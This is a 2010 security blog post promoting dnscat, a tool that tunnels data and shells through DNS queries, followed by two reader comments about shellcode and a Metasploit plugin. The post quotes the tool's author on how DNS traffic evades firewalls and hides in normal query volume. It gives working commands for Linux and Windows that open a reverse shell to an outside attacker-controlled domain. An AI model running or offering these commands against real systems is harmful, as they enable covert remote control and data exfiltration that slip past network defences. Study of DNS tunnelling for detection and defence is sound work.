Thursday, February 25, 2010

DNSCAT. Really Awesome

Hi folks,
today I want to point out dnscat. Man-in-the-middle attacks on DNS are nothing new (ettercap-ng has been spoofing DNS answers for years), but dnscat is a different beast entirely: instead of tampering with DNS answers, it tunnels data inside ordinary DNS queries. Like netcat or Ncat, dnscat gives you a direct channel between a client and a server. You can use it to exchange files, to send strings, or even to get a reverse shell ;). Here is how Ron describes it:
Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren't going to stop you from talking to your local DNS server, right? And I don't know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.

In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key -- to be a server, you have to be the authoritative nameserver for a domain. For example, I'm the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 208.81.2.52 (my current address).
Example: Remote shell.

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

dnscat --listen

And run the shell on the client side:

Linux/BSD:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Download from mirror (RS), Home Page DNSCAT

Thank you Ron, this is really awesome. Now ... who has enough time to write a Metasploit plugin?

2 comments:

Ron said...

You're welcome. Thanks for your kind words!

I am actually working on some generic shellcode right now. This isn't my specialty, but I'm really having fun with it. Doing it for Metasploit is definitely something I'm hoping to do in the future.

Ron

Marco Ramilli said...

:D Cool !

I am looking forward to seeing it. Having an MS plugin means having a lot of different payloads already written and tested. Thanks for your contribution!
BTW, if you need help feel free to contact me.